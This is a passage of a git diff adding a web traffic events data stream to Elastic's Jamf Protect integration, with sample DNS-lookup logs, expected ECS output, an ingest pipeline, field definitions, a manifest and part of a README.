Stream"},"timestamp":"2024-02-02T06:29:12.031Z","account":{"customerId":"777a7e56-e0ae-4bb9-ac2c-47015dcd2c68","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3"},"device":{"deviceId":"c0dd2643-ae93-43a9-bc71-6d93555c1f54","osType":""},"destination":{"ips":[]},"source":{"ip":"24.209.152.211"},"domain":"microsoft","tld":"com","hostName":"edge.microsoft.com","threat":{"result":"CLEAN","types":[]},"dns":{"recordType":"HTTPS","responseStatus":"NOERROR","ttl":144,"category":"Custom"},"blocked":false,"receiptTime":1706855352031,"user":{"email":"","name":""}}} +{"event":{"signatureId":{"id":"3","name":"DNS Lookup"},"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Network Traffic Stream"},"timestamp":"2024-01-25T02:20:05.709Z","account":{"customerId":"777a7e56-e0ae-4bb9-ac2c-47015dcd2c68","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3"},"device":{"deviceId":"b57306b5-69f8-4e24-a269-466753e39cc1","osType":"MAC_OS","externalId":"081de2ca-9228-56d0-ad00-bf11afa67710"},"destination":{"ips":[]},"domain":"trafficmanager","tld":"net","hostName":"presence.services.sfb.trafficmanager.net","threat":{"result":"CLEAN","types":[]},"dns":{"recordType":"HTTPS","responseStatus":"NOERROR","ttl":0,"category":"Productivity"},"blocked":false,"receiptTime":1706149205709,"user":{"email":"matthew.ward@jamf.com","name":"Matthew Ward"}}} +{"event":{"signatureId":{"id":"3","name":"DNS Lookup"},"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Network Traffic Stream"},"timestamp":"2024-01-25T02:30:47.470Z","account":{"customerId":"777a7e56-e0ae-4bb9-ac2c-47015dcd2c68","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3"},"device":{"deviceId":"b57306b5-69f8-4e24-a269-466753e39cc1","osType":"MAC_OS","externalId":"081de2ca-9228-56d0-ad00-bf11afa67710"},"destination":{"ips":["2620:149:a41:880::2:7"]},"domain":"icloud","tld":"com","hostName":"p25-content.icloud.com","threat":{"result":"CLEAN","types":[]},"dns":{"recordType":"AAAA","responseStatus":"NOERROR","ttl":36,"category":"Cloud & File Storage"},"blocked":false,"receiptTime":1706149847470,"user":{"email":"matthew.ward@jamf.com","name":"Matthew Ward"}}} +{"event":{"signatureId":{"id":"3","name":"DNS Lookup"},"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Network Traffic Stream"},"timestamp":"2024-01-24T20:18:55.235Z","account":{"customerId":"777a7e56-e0ae-4bb9-ac2c-47015dcd2c68","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3"},"device":{"deviceId":"b57306b5-69f8-4e24-a269-466753e39cc1","osType":"MAC_OS","externalId":"081de2ca-9228-56d0-ad00-bf11afa67710"},"destination":{"ips":["64.20.34.139"]},"domain":"crowdexpert","tld":"org","hostName":"crowdexpert.org","threat":{"result":"DIRTY","types":["malware"]},"dns":{"recordType":"A","responseStatus":"NOERROR","ttl":10,"category":"Uncategorized"},"blocked":true,"receiptTime":1706127535235,"user":{"email":"matthew.ward@jamf.com","name":"Matthew Ward"}}} +{"event":{"signatureId":{"id":"3","name":"DNS Lookup"},"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Network Traffic Stream"},"timestamp":"2024-01-12T03:51:47.216Z","account":{"customerId":"9608556b-0c3a-4a9c-9b4a-d714d8a028a1","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3"},"device":{"deviceId":"cd531c8a-26ed-419a-8fd4-f67702f40ad5","osType":"IOS"},"destination":{"ips":[]},"source":{"ip":"107.10.7.168"},"networkInterface":"WIFI","domain":"bidagy","tld":"com","hostName":"sli.bidagy.com","threat":{"result":"DIRTY","types":["malware"]},"dns":{"recordType":"HTTPS","responseStatus":"NOERROR","ttl":0},"blocked":true,"receiptTime":1705031507216,"user":{"email":"hjilling@icloud.com","name":"07a5a2ae-16de-4767-831e-0ea8b7c3abe4"}}} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_traffic_events/_dev/test/pipeline/test-jamf-protect-traffic-sample-logs.log-expected.json b/packages/jamf_protect/data_stream/web_traffic_events/_dev/test/pipeline/test-jamf-protect-traffic-sample-logs.log-expected.json new file mode 100644 index 00000000000..5302187101f --- /dev/null +++ b/packages/jamf_protect/data_stream/web_traffic_events/_dev/test/pipeline/test-jamf-protect-traffic-sample-logs.log-expected.json @@ -0,0 +1,337 @@ +{ + "expected": [ + { + "dns": { + "answers": { + "ttl": 101, + "type": "HTTPS" + }, + "question": { + "name": "s.youtube.com", + "registered_domain": "youtube", + "top_level_domain": "com" + }, + "response_code": "NOERROR" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DNS Lookup", + "category": [ + "host", + "network" + ], + "kind": "event", + "outcome": [ + "success" + ], + "provider": "Jamf Protect", + "reason": "CLEAN", + "start": "2024-02-02T06:26:04.273Z", + "type": [ + "connection" + ] + }, + "host": { + "id": "3453be41-0f2d-4d43-9ec2-a53f39fff93c", + "os": { + "type": [ + "ios" + ] + } + }, + "interface": { + "name": "WIFI" + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "9608556b-0c3a-4a9c-9b4a-d714d8a028a1" + }, + "rule": { + "name": "DNS Lookup" + }, + "user": { + "email": "hjilling@icloud.com", + "name": "07a5a2ae-16de-4767-831e-0ea8b7c3abe4" + } + }, + { + "dns": { + "answers": { + "ttl": 144, + "type": "HTTPS" + }, + "question": { + "name": "edge.microsoft.com", + "registered_domain": "microsoft", + "top_level_domain": "com" + }, + "response_code": "NOERROR" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DNS Lookup", + "category": [ + "host", + "network" + ], + "kind": "event", + "outcome": [ + "success" + ], + "provider": "Jamf Protect", + "reason": "CLEAN", + "start": "2024-02-02T06:29:12.031Z", + "type": [ + "connection" + ] + }, + "host": { + "id": "c0dd2643-ae93-43a9-bc71-6d93555c1f54" + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "777a7e56-e0ae-4bb9-ac2c-47015dcd2c68" + }, + "rule": { + "name": "DNS Lookup" + } + }, + { + "dns": { + "answers": { + "ttl": 0, + "type": "HTTPS" + }, + "question": { + "name": "presence.services.sfb.trafficmanager.net", + "registered_domain": "trafficmanager", + "top_level_domain": "net" + }, + "response_code": "NOERROR" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DNS Lookup", + "category": [ + "host", + "network" + ], + "kind": "event", + "outcome": [ + "success" + ], + "provider": "Jamf Protect", + "reason": "CLEAN", + "start": "2024-01-25T02:20:05.709Z", + "type": [ + "connection" + ] + }, + "host": { + "id": "b57306b5-69f8-4e24-a269-466753e39cc1", + "os": { + "type": [ + "macos" + ] + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "777a7e56-e0ae-4bb9-ac2c-47015dcd2c68" + }, + "rule": { + "name": "DNS Lookup" + }, + "user": { + "email": "matthew.ward@jamf.com", + "name": "Matthew Ward" + } + }, + { + "dns": { + "answers": { + "ttl": 36, + "type": "AAAA" + }, + "question": { + "name": "p25-content.icloud.com", + "registered_domain": "icloud", + "top_level_domain": "com" + }, + "response_code": "NOERROR" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DNS Lookup", + "category": [ + "host", + "network" + ], + "kind": "event", + "outcome": [ + "success" + ], + "provider": "Jamf Protect", + "reason": "CLEAN", + "start": "2024-01-25T02:30:47.470Z", + "type": [ + "connection" + ] + }, + "host": { + "id": "b57306b5-69f8-4e24-a269-466753e39cc1", + "os": { + "type": [ + "macos" + ] + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "777a7e56-e0ae-4bb9-ac2c-47015dcd2c68" + }, + "rule": { + "name": "DNS Lookup" + }, + "user": { + "email": "matthew.ward@jamf.com", + "name": "Matthew Ward" + } + }, + { + "dns": { + "answers": { + "ttl": 10, + "type": "A" + }, + "question": { + "name": "crowdexpert.org", + "registered_domain": "crowdexpert", + "top_level_domain": "org" + }, + "response_code": "NOERROR" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DNS Lookup", + "category": [ + "host", + "network" + ], + "kind": "event", + "outcome": [ + "failure" + ], + "provider": "Jamf Protect", + "reason": "DIRTY", + "start": "2024-01-24T20:18:55.235Z", + "type": [ + "connection" + ] + }, + "host": { + "id": "b57306b5-69f8-4e24-a269-466753e39cc1", + "os": { + "type": [ + "macos" + ] + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "777a7e56-e0ae-4bb9-ac2c-47015dcd2c68" + }, + "rule": { + "name": "DNS Lookup" + }, + "user": { + "email": "matthew.ward@jamf.com", + "name": "Matthew Ward" + } + }, + { + "dns": { + "answers": { + "ttl": 0, + "type": "HTTPS" + }, + "question": { + "name": "sli.bidagy.com", + "registered_domain": "bidagy", + "top_level_domain": "com" + }, + "response_code": "NOERROR" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DNS Lookup", + "category": [ + "host", + "network" + ], + "kind": "event", + "outcome": [ + "failure" + ], + "provider": "Jamf Protect", + "reason": "DIRTY", + "start": "2024-01-12T03:51:47.216Z", + "type": [ + "connection" + ] + }, + "host": { + "id": "cd531c8a-26ed-419a-8fd4-f67702f40ad5", + "os": { + "type": [ + "ios" + ] + } + }, + "interface": { + "name": "WIFI" + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "9608556b-0c3a-4a9c-9b4a-d714d8a028a1" + }, + "rule": { + "name": "DNS Lookup" + }, + "user": { + "email": "hjilling@icloud.com", + "name": "07a5a2ae-16de-4767-831e-0ea8b7c3abe4" + } + } + ] +} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_traffic_events/agent/stream/http_endpoint.yml.hbs b/packages/jamf_protect/data_stream/web_traffic_events/agent/stream/http_endpoint.yml.hbs new file mode 100644 index 00000000000..030c4a24f77 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_traffic_events/agent/stream/http_endpoint.yml.hbs @@ -0,0 +1,38 @@ +listen_address: {{listen_address}} +listen_port: {{listen_port}} +url: {{url}} +{{#if secret_header}} +secret.header: {{secret_header}} +{{/if}} +{{#if secret_value}} +secret.value: {{secret_value}} +{{/if}} +{{#if preserve_original_event}} +preserve_original_event: true +{{/if}} +{{#if preserve_duplicate_custom_fields}} +preserve_duplicate_custom_fields: true +{{/if}} +tags: +{{#if preserve_original_event}} +- preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} +- preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} +- {{tag}} +{{/each}} +{{#if content_type }} +content_type: {{ content_type }} +{{/if}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if ssl}} +ssl: {{ssl}} +{{/if}} +{{#if processors}} +processors: +{{processors}} +{{/if}} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_traffic_events/elasticsearch/ingest_pipeline/default.yml b/packages/jamf_protect/data_stream/web_traffic_events/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..14aac2e7595 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_traffic_events/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,280 @@ +--- +description: Pipeline for parsing Jamf Protect Web Protection traffic logs +processors: + - set: + field: ecs.version + value: '8.11.0' + - json: + field: message + target_field: jamf_protect.traffic + if: ctx.message != null + - rename: + field: json + target_field: jamf_protect.traffic + if: ctx.json != null + +########################## +## ECS Observer Mapping ## +########################## + - set: + field: observer.product + value: Jamf Protect + - set: + field: observer.vendor + value: Jamf + +####################### +## ECS Event Mapping ## +####################### + - set: + field: event.kind + value: event + - set: + field: event.provider + value: Jamf Protect + - rename: + field: jamf_protect.traffic.event.timestamp + target_field: event.start + if: ctx.jamf_protect?.traffic?.event?.timestamp != null + - append: + field: event.category + value: host + - append: + field: event.category + value: network + - append: + field: event.type + value: connection + - append: + field: event.category + value: malware + if: ctx.jamf_protect?.traffic?.event?.threat?.types == 'malware' + - set: + field: event.action + value: '{{jamf_protect.traffic.event.signatureId.name}}' + if: ctx.jamf_protect?.traffic?.event?.signatureId?.name != null + - set: + field: event.reason + value: '{{jamf_protect.traffic.event.threat.result}}' + if: ctx.jamf_protect?.traffic?.event?.threat?.result != null + - append: + field: event.outcome + value: failure + if: ctx.jamf_protect?.traffic?.event?.blocked == true + - append: + field: event.outcome + value: success + if: ctx.jamf_protect?.traffic?.event?.blocked == false + # ignore_missing: true + + +####################### +## ECS Rule Mapping ## +####################### + - set: + field: rule.name + value: '{{jamf_protect.traffic.event.signatureId.name}}' + if: ctx.jamf_protect?.traffic?.event?.signatureId?.name != null + # ignore_missing: true + - rename: + field: jamf_protect.traffic.event.signatureId.id.toString() + target_field: rule.id + if: ctx.jamf_protect?.traffic?.event?.signatureId?.id != null + ignore_missing: true + + +####################### +## ECS Host Mapping ## +####################### + - rename: + field: jamf_protect.traffic.event.device.userDeviceName + target_field: host.hostname + ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.device?.userDeviceName != null + - rename: + field: jamf_protect.traffic.event.device.deviceName + target_field: host.hostname + ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.device?.deviceName == null && ctx.jamf_protect?.traffic?.event?.device?.userDeviceName != null + - rename: + field: jamf_protect.traffic.event.device.deviceId + target_field: host.id + ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.device?.deviceId != null + # - rename: + # field: jamf_protect.traffic.event.host.ips + # target_field: host.ip + # ignore_missing: true + # if: ctx.jamf_protect?.traffic?.event?.host?.ips != null && ctx.jamf_protect?.traffic?.event?.host?.ips != "" + - rename: + field: jamf_protect.traffic.event.device.os + target_field: host.os.full + if: ctx.jamf_protect?.traffic?.event?.device?.os != null + ignore_missing: true + - append: + field: host.os.type + value: ios + if: ctx.jamf_protect?.traffic?.event?.device?.osType == "IOS" + - append: + field: host.os.type + value: macos + if: ctx.jamf_protect?.traffic?.event?.device?.osType == "MAC_OS" + +####################### +## ECS Interface Mapping ## +####################### + - rename: + field: jamf_protect.traffic.event.networkInterface + target_field: interface.name + ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.networkInterface != null + + +######################## +## ECS User Mapping ## +######################## + + - rename: + field: jamf_protect.traffic.event.user.name + target_field: user.name + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.user?.name != null + - rename: + field: jamf_protect.traffic.event.user.email + target_field: user.email + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.user?.email != null + + +######################## +## ECS DNS Mapping ## +######################## + - rename: + field: jamf_protect.traffic.event.tld + target_field: dns.question.top_level_domain + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.tld != null + - rename: + field: jamf_protect.traffic.event.domain + target_field: dns.question.registered_domain + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.domain != null + - rename: + field: jamf_protect.traffic.event.hostName + target_field: dns.question.name + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.hostName != null + + + - rename: + field: jamf_protect.traffic.event.dns.responseStatus + target_field: dns.response_code + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.dns?.responseStatus != null + - rename: + field: jamf_protect.traffic.event.dns.recordType + target_field: dns.answers.type + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.dns?.recordType != null + - rename: + field: jamf_protect.traffic.event.dns.ttl + target_field: dns.answers.ttl + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.dns?.ttl != null + - set: + field: dns.resolved_ip + value: '{{jamf_protect.traffic.event.destination.ip}}' + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.destination?.ip != null + +######################## +## ECS GEO Mapping ## +######################## + - rename: + field: jamf_protect.traffic.event.location + target_field: host.geo.country_iso_code + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.location != null + + +####################### +## ECS Destination Mapping ## +####################### + - rename: + field: jamf_protect.traffic.event.destination.ip + target_field: destination.address + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.destination?.ip != null + - rename: + field: jamf_protect.traffic.event.destination.name + target_field: destination.domain + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.destination?.name != null + - rename: + field: jamf_protect.traffic.event.destination.port + target_field: destination.port + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.destination?.port != null + + +####################### +## ECS Source Mapping ## +####################### + - rename: + field: jamf_protect.traffic.event.source.ip + target_field: source.address + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.destination?.ip != null + - rename: + field: jamf_protect.traffic.event.source.port + target_field: source.port + # ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.source?.port != null + +# ######################## +# # ECS Organization Mapping ## +# ######################## + - rename: + field: jamf_protect.traffic.event.account.customerId + target_field: organization.id + ignore_missing: true + if: ctx.jamf_protect?.traffic?.event?.account?.customerId != null + +############# +## Cleanup ## +############# + - remove: + field: + - jamf_protect.traffic + - jamf_protect + - message + ignore_missing: true + - remove: + field: event.original + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + ignore_failure: true + - script: + description: Drops null/empty values recursively. + lang: painless + source: + boolean dropEmptyFields(Object object) { + if (object == null || object == '') { + return true; + } else if (object instanceof Map) { + ((Map) object).values().removeIf(value -> dropEmptyFields(value)); + return (((Map) object).size() == 0); + } else if (object instanceof List) { + ((List) object).removeIf(value -> dropEmptyFields(value)); + return (((List) object).length == 0); + } + return false; + } + dropEmptyFields(ctx); + +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_traffic_events/fields/base-fields.yml b/packages/jamf_protect/data_stream/web_traffic_events/fields/base-fields.yml new file mode 100644 index 00000000000..92879829be9 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_traffic_events/fields/base-fields.yml @@ -0,0 +1,20 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. +- name: event.dataset + type: constant_keyword + description: Name of the dataset. + value: jamf_protect.web-traffic-events +- name: event.module + type: constant_keyword + description: Event module. + value: jamf_protect diff --git a/packages/jamf_protect/data_stream/web_traffic_events/fields/ecs.yml b/packages/jamf_protect/data_stream/web_traffic_events/fields/ecs.yml new file mode 100644 index 00000000000..77b07531fbe --- /dev/null +++ b/packages/jamf_protect/data_stream/web_traffic_events/fields/ecs.yml @@ -0,0 +1,212 @@ +- external: ecs + name: ecs.version +- external: ecs + name: error.message +- external: ecs + name: event.action +- external: ecs + name: event.created +- external: ecs + name: event.code +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.outcome +- external: ecs + name: event.severity +- external: ecs + name: event.start +- external: ecs + name: event.category +- external: ecs + name: event.id +- external: ecs + name: event.timezone +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: user.name +- external: ecs + name: user.domain +- external: ecs + name: user.email +- external: ecs + name: related.hosts +- external: ecs + name: related.hash +- external: ecs + name: file.hash.md5 +- external: ecs + name: file.hash.sha1 +- external: ecs + name: file.hash.sha256 +- external: ecs + name: file.name +- external: ecs + name: file.path +- external: ecs + name: file.gid +- external: ecs + name: file.inode +- external: ecs + name: file.mode +- external: ecs + name: file.size +- external: ecs + name: file.uid +- external: ecs + name: file.code_signature.signing_id +- external: ecs + name: file.code_signature.status +- external: ecs + name: file.code_signature.team_id +- external: ecs + name: destination.address +- external: ecs + name: dns.answers.ttl +- external: ecs + name: dns.answers.type +- external: ecs + name: dns.question.name +- external: ecs + name: dns.question.registered_domain +- external: ecs + name: dns.question.top_level_domain +- external: ecs + name: dns.response_code +- external: ecs + name: destination.as.number +- external: ecs + name: destination.as.organization.name +- external: ecs + name: destination.domain +- external: ecs + name: destination.geo.continent_name +- external: ecs + name: destination.geo.country_iso_code +- external: ecs + name: destination.geo.city_name +- external: ecs + name: destination.geo.country_name +- external: ecs + name: destination.geo.location +- external: ecs + name: destination.ip +- external: ecs + name: destination.port +- external: ecs + name: network.direction +- external: ecs + name: network.transport +- external: ecs + name: source.domain +- external: ecs + name: source.ip +- external: ecs + name: source.port +- external: ecs + name: tags +- external: ecs + name: ecs.version +- external: ecs + name: error.message +- external: ecs + name: event.action +- external: ecs + name: event.category +- external: ecs + name: event.created +- external: ecs + name: event.duration +- external: ecs + name: event.end +- external: ecs + name: event.id +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.provider +- external: ecs + name: event.severity +- external: ecs + name: event.start +- external: ecs + name: event.type +- external: ecs + name: interface.name +- external: ecs + name: file.extension +- external: ecs + name: file.hash.md5 +- external: ecs + name: file.hash.sha1 +- external: ecs + name: file.hash.sha256 +- external: ecs + name: file.hash.sha512 +- external: ecs + name: file.name +- external: ecs + name: file.path +- external: ecs + name: log.file.path +- external: ecs + name: log.logger +- external: ecs + name: message +- external: ecs + name: observer.name +- external: ecs + name: observer.product +- external: ecs + name: observer.type +- external: ecs + name: observer.vendor +- external: ecs + name: process.command_line +- external: ecs + name: process.parent.pid +- external: ecs + name: process.parent.start +- external: ecs + name: process.pid +- external: ecs + name: process.start +- external: ecs + name: related.hash +- external: ecs + name: related.hosts +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: rule.description +- external: ecs + name: rule.name +- external: ecs + name: rule.id +- external: ecs + name: tags +- external: ecs + name: user.domain +- external: ecs + name: user.id +- external: ecs + name: user.name +- external: ecs + name: group.id +- external: ecs + name: host.geo.country_iso_code +- external: ecs + name: group.name +- name: organization.id + type: keyword diff --git a/packages/jamf_protect/data_stream/web_traffic_events/manifest.yml b/packages/jamf_protect/data_stream/web_traffic_events/manifest.yml new file mode 100644 index 00000000000..4d92f6aee1b --- /dev/null +++ b/packages/jamf_protect/data_stream/web_traffic_events/manifest.yml @@ -0,0 +1,66 @@ +title: Receives Web Traffic Events from Jamf Protect with Elastic Agent. +type: logs +streams: + - input: http_endpoint + template_path: http_endpoint.yml.hbs + title: Jamf Protect Web Traffic Events + description: Receives Web Traffic Events from Jamf Protect with Elastic Agent. + vars: + - name: listen_port + type: integer + title: Listen Port + description: The port number the listener binds to. + multi: false + required: true + show_user: true + default: 9553 + - name: url + type: text + title: URL + description: This option specifies which URL path to accept requests on. Defaults to /. + multi: false + required: false + show_user: false + default: / + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - jamf_protect-web-traffic-events + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: true + title: Preserve duplicate custom fields + description: Preserve custom fields for all ECS mappings. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: content_type + type: text + title: Content types + multi: false + default: + - application/json;charset=UTF-8 + required: true + show_user: true + description: By default the input expects the incoming POST to include a Content-Type of application/json to try to enforce the incoming data to be valid JSON. In certain scenarios when the source of the request is not able to do that, it can be overwritten with another value or set to null. diff --git a/packages/jamf_protect/data_stream/web_traffic_events/sample_event.json b/packages/jamf_protect/data_stream/web_traffic_events/sample_event.json new file mode 100644 index 00000000000..5842b8ec846 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_traffic_events/sample_event.json @@ -0,0 +1,61 @@ +{ + "dns": { + "answers": { + "ttl": 101, + "type": "HTTPS" + }, + "question": { + "name": "s.youtube.com", + "registered_domain": "youtube", + "top_level_domain": "com" + }, + "response_code": "NOERROR" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DNS Lookup", + "category": [ + "host", + "network" + ], + "kind": "event", + "module": "jamf_protect", + "outcome": [ + "success" + ], + "provider": "Jamf Protect", + "reason": "CLEAN", + "start": "2024-02-02T06:26:04.273Z", + "type": [ + "connection" + ] + }, + "host": { + "id": "3453be41-0f2d-4d43-9ec2-a53f39fff93c", + "os": { + "type": [ + "ios" + ] + } + }, + "interface": { + "name": "WIFI" + }, + "jamf_protect": {}, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "9608556b-0c3a-4a9c-9b4a-d714d8a028a1" + }, + "rule": { + "name": "DNS Lookup" + }, + "user": { + "email": "user@acme.com", + "name": "07a5a2ae-16de-4767-831e-0ea8b7c3abe4" + } +} \ No newline at end of file diff --git a/packages/jamf_protect/docs/README.md b/packages/jamf_protect/docs/README.md new file mode 100644 index 00000000000..1978df629b7 --- /dev/null +++ b/packages/jamf_protect/docs/README.md @@ -0,0 +1,1141 @@ +# Jamf Protect + +The Jamf Protect integration collects and parses data received from [Jamf Protect](https://learn.jamf.com/bundle/jamf-protect-documentation/page/About_Jamf_Protect.html) using a HTTP endpoint. + +Use the Jamf Protect integration to collect logs from your machines. +Then visualize that data in Kibana, create alerts to notify you if something goes wrong, and reference data when troubleshooting an issue. + +## Data streams + +The Jamf Protect integration collects 4 types of events: alerts, telemetry, web threat events, and web traffic events. + +[**Alerts**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Alerts.html) help you keep a record of Alerts and Unified Logs happening on endpoints using Jamf Protect. + +[**Telemetry**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Creating_an_Action_Configuration.html) help you keep a record of audit events happening on endpoints using Jamf Protect. + +[**Web threat events**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Data_Streams_Overview.html) help you keep a record of web threat events happening on endpoints using Jamf Protect. + +[**Web traffic events**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Data_Streams_Overview.html) help you keep a record of content filtering and network requests happening on endpoints using Jamf Protect. + +## Requirements + +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. +You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + +## Setup + +To use this integration, you will also need to: +- Enable the integration in Elastic +- Configure Jamf Protect (macOS Security) to send logs to the Elastic Agent (Custom HTTP Endpoint Logs) + - Remote Alert Collection Endpoints + - Unified Logs Collection Endpoints + - Telemetry Collection Endpoints +- Configure Jamf Protect (Jamf Security Cloud) to send logs to the Elastic Agent (Custom HTTP Endpoint Logs) + - Threat Event Stream + - Network Traffic Stream + + +### Enable the integration in Elastic + +For step-by-step instructions on how to set up an new integration in Elastic, see the +[Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. +When setting up the integration, you will choose to collect logs via HTTP Endpoint. + +### Configure Jamf Protect + +After validating settings, you can configure Jamf Protect to send events to Elastic. +For more information on configuring Jamf Protect, see +- [Creating an Action Configuration](https://learn.jamf.com/bundle/jamf-protect-documentation/page/Creating_an_Action_Configuration.html) +- [Configure Threat Event Stream](https://learn.jamf.com/bundle/jamf-protect-documentation/page/Configuring_the_Network_Threat_Events_Stream_to_send_HTTP_Events.html) +- [Configure Network Traffic Stream](https://learn.jamf.com/bundle/jamf-protect-documentation/page/Configuring_the_Network_Threat_Events_Stream_to_send_HTTP_Events.html) + +Then, depending on which events you want to send to Elastic, configure one or multiple HTTP endpoints: + +**Remote Alert Collection Endpoints**: +- In the URL field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + +**Unified Logs Collection Endpoints**: +- In the URL field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + +**Telemetry Collection Endpoints**: +- In the URL field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + +**Threats Event Stream**: +- In the Server hostname or IP field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + +**Network Traffic Stream**: +- In the Server hostname or IP field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + + +**Copyright (c) 2024, Jamf Software, LLC. All rights reserved.** + +## Logs reference + +#### alerts + +This is the `Alerts` dataset. + +##### Example + +An example event for `alerts` looks as following: + +```json +{ + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "User Elevated Action", + "category": [ + "host", + "process" + ], + "id": "7232d4a4-2289-49ba-a218-215ef3d62ec4", + "kind": "alert", + "module": "jamf_protect", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "Application used deprecated elevation API", + "severity": 0, + "start": "2023-11-01T12:20:38.851Z", + "type": [ + "start" + ] + }, + "group": { + "id": "0", + "name": "wheel" + }, + "host": { + "hostname": "VMAC-2C23RW4DY", + "id": "0000FE00-8406CE28ECFC4DAB", + "ip": [ + "192.168.11.226" + ], + "os": { + "family": "macos", + "full": "Version 14.0 (Build 23A344)" + } + }, + "message": "{\"caid\":\"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7\",\"certid\":\"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea\",\"input\":{\"host\":{\"os\":\"Version 14.0 (Build 